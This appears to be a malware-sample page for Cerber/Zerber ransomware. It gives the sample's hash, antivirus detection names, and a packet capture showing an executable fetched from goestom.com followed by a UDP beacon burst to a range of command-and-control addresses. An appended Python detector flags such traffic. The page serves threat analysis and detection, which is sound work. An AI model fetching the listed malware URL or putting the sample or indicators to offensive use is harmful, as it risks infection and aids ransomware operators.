
Cerber/Zerber Ransomware Malware File Sample PCAP Download Traffic Analysis goestom.com exe1.exe

Download Attachments

  • 1 pcap exe1
    Date added: May 9, 2017 1:16 am
    Added by: admin
    File size: 186 KB
    Downloads: 142

SHA256: 681dd9f73db50422536b422e83d0dabfe172e9e94b483b6df5f6a09226856c37
File name: exe1.exe
Detection ratio: 23 / 59

Engine                   Detection                                      Last update
Ad-Aware                 Trojan.GenericKD.5015659                       20170509
AegisLab                 Ransom.Cerber.Smjak!c                          20170508
Arcabit                  Trojan.Generic.D4C886B                         20170509
Baidu                    Win32.Trojan.WisdomEyes.16070401.9500.9999     20170503
BitDefender              Trojan.GenericKD.5015659                       20170509
CrowdStrike Falcon (ML)  malicious_confidence_98% (W)                   20170130
Emsisoft                 Trojan.GenericKD.5015659 (B)                   20170508
Endgame                  malicious (high confidence)                    20170503
F-Secure                 Trojan.GenericKD.5015659                       20170508
GData                    Trojan.GenericKD.5015659                       20170508
Invincea                 trojandownloader.win32.unruy.i                 20170413
Kaspersky                Trojan-Ransom.Win32.Zerber.ebdr                20170508
Malwarebytes             Ransom.Cerber                                  20170509
McAfee                   Artemis!8C290A321DCB                           20170509
McAfee-GW-Edition        BehavesLike.Win32.Dropper.hc                   20170508
eScan                    Trojan.GenericKD.5015659

2017-05-08 19:44:02.346328 IP 192.168.1.102.54506 > 185.23.21.18.80: Flags [P.], seq 0:420, ack 1, win 256, length 420: HTTP: GET /language/overrides/counter/exe1.exe HTTP/1.1
E.....@...V....f.......P...[.<..P...r...GET /language/overrides/counter/exe1.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: goestom.com
Connection: Keep-Alive

2017-05-08 19:44:22.638417 IP 192.168.1.102.54094 > 94.23.175.160.6893: UDP, length 14
E..*......RW...f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.638506 IP 192.168.1.102.54094 > 94.23.175.161.6893: UDP, length 14
E..*".....IC...f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.638616 IP 192.168.1.102.54094 > 94.23.175.162.6893: UDP, length 14
E..*^+.........f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.638701 IP 192.168.1.102.54094 > 94.23.175.163.6893: UDP, length 14
E..*g:.........f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.638819 IP 192.168.1.102.54094 > 94.23.175.164.6893: UDP, length 14
E..*7.....4....f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.638941 IP 192.168.1.102.54094 > 94.23.175.165.6893: UDP, length 14
E..*A.....*....f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639025 IP 192.168.1.102.54094 > 94.23.175.166.6893: UDP, length 14
E..*|t.........f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639128 IP 192.168.1.102.54094 > 94.23.175.167.6893: UDP, length 14
E..*.w....f....f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639217 IP 192.168.1.102.54094 > 94.23.175.168.6893: UDP, length 14
E..*
.....a(...f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639322 IP 192.168.1.102.54094 > 94.23.175.169.6893: UDP, length 14
E..*......Z....f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639407 IP 192.168.1.102.54094 > 94.23.175.170.6893: UDP, length 14
E..*OT.........f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639510 IP 192.168.1.102.54094 > 94.23.175.171.6893: UDP, length 14
E..*V_.........f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639599 IP 192.168.1.102.54094 > 94.23.175.172.6893: UDP, length 14
E..*).....B....f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639698 IP 192.168.1.102.54094 > 94.23.175.173.6893: UDP, length 14
E..*0)....;....f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639786 IP 192.168.1.102.54094 > 94.23.175.174.6893: UDP, length 14
E..*m......S...f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.639907 IP 192.168.1.102.54094 > 94.23.175.175.6893: UDP, length 14
E..*t......K...f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.640000 IP 192.168.1.102.54094 > 94.23.175.176.6893: UDP, length 14
E..*"G....I....f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.640104 IP 192.168.1.102.54094 > 94.23.175.177.6893: UDP, length 14
E..*.:....P....f^....N......b8ffd01f27a8b3....
2017-05-08 19:44:22.640187 IP 192.168.1.102.54094 > 94.23.175.178.6893: UDP, length 14
E..*e......!...f^....N......b8ffd01f27a8b3....
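The UDP burst above (one 14-byte datagram from source port 54094 to each of 94.23.175.160 through .178 on port 6893, all inside about two milliseconds and twenty seconds after the executable fetch from goestom.com) is the kind of pattern a detection script can pull out of tcpdump summary output. The following Python is an added example, not code from this page or its author: it parses the one-line packet summaries (the -A ASCII dump lines are ignored), flags a source port that sends same-size UDP datagrams to many distinct hosts on one destination port inside a short window, and flags HTTP GETs for .exe paths together with the Host header that follows. The thresholds (8 targets within 5 seconds) are the example's own assumption, and the sample lines are constructed to match the shape of the capture above with evenly spaced timestamps.

```python
"""Flag a UDP beacon spray and an executable download in tcpdump summary
output. Only the packet-summary lines are parsed; -A ASCII lines are skipped."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$"
)
UDP_RE = re.compile(r"^UDP, length (?P<length>\d+)$")
HTTP_GET_RE = re.compile(r"HTTP: GET (?P<path>\S+) HTTP/1\.[01]")


def parse_summary(line):
    """Return a dict for a tcpdump IP summary line, or None for any other line."""
    m = SUMMARY_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S.%f")
    d["sport"], d["dport"] = int(d["sport"]), int(d["dport"])
    return d


def find_udp_sprays(lines, min_targets=8, window_s=5.0):
    """One source port sending same-size UDP datagrams to at least
    min_targets distinct hosts on one destination port within window_s."""
    groups = defaultdict(list)  # (src, sport, dport, length) -> [(ts, dst)]
    for line in lines:
        p = parse_summary(line)
        u = UDP_RE.match(p["rest"]) if p else None
        if u:
            groups[(p["src"], p["sport"], p["dport"], int(u["length"]))].append((p["ts"], p["dst"]))

    findings = []
    for (src, sport, dport, length), events in groups.items():
        events.sort()
        best, start = set(), 0
        for end in range(len(events)):  # slide a time window over the datagrams
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            if len(targets) > len(best):
                best = targets
        if len(best) < min_targets:
            continue
        nums = sorted(int(ipaddress.ip_address(ip)) for ip in best)
        findings.append({
            "src": f"{src}:{sport}", "dport": dport, "length": length,
            "targets": len(best),
            # a contiguous address range is typical of a hard-coded beacon list
            "contiguous": nums[-1] - nums[0] == len(nums) - 1,
            "first_target": str(ipaddress.ip_address(nums[0])),
            "last_target": str(ipaddress.ip_address(nums[-1])),
        })
    return findings


def find_exe_downloads(lines):
    """HTTP GETs whose path ends in .exe, with the Host header that tcpdump -A
    prints on the following lines when it is present."""
    hits = []
    for i, line in enumerate(lines):
        p = parse_summary(line)
        g = HTTP_GET_RE.search(p["rest"]) if p else None
        if not g or not g["path"].lower().endswith(".exe"):
            continue
        host = None
        for follow in lines[i + 1:i + 12]:  # headers end at the first blank line
            if follow.strip() == "":
                break
            if follow.lower().startswith("host:"):
                host = follow.split(":", 1)[1].strip()
                break
        hits.append({"ts": p["ts"].isoformat(), "dst": f"{p['dst']}:{p['dport']}",
                     "host": host, "path": g["path"]})
    return hits


# Constructed sample in the shape of the capture above: the HTTP request with a
# few of its headers, then one datagram per target .160-.178, 100 us apart
# (the real inter-packet gaps differ slightly).
SAMPLE_LINES = [
    "2017-05-08 19:44:02.346328 IP 192.168.1.102.54506 > 185.23.21.18.80: Flags [P.], "
    "seq 0:420, ack 1, win 256, length 420: HTTP: GET /language/overrides/counter/exe1.exe HTTP/1.1",
    "Accept: image/jpeg, */*",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    "Host: goestom.com",
    "Connection: Keep-Alive",
    "",
] + [
    f"2017-05-08 19:44:22.{638417 + i * 100:06d} IP 192.168.1.102.54094 "
    f"> 94.23.175.{160 + i}.6893: UDP, length 14"
    for i in range(19)
]

if __name__ == "__main__":
    for f in find_udp_sprays(SAMPLE_LINES):
        print("UDP spray:", f)
    for h in find_exe_downloads(SAMPLE_LINES):
        print("EXE download:", h)
```

Run against a real capture with `tcpdump -tttt -nn -r exe1.pcap` piped into the parser (the `-nn` keeps addresses and ports numeric, matching the regex); a spray with `contiguous` set is worth correlating with any executable download from the same host in the preceding minute, which is exactly the sequence the capture shows.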
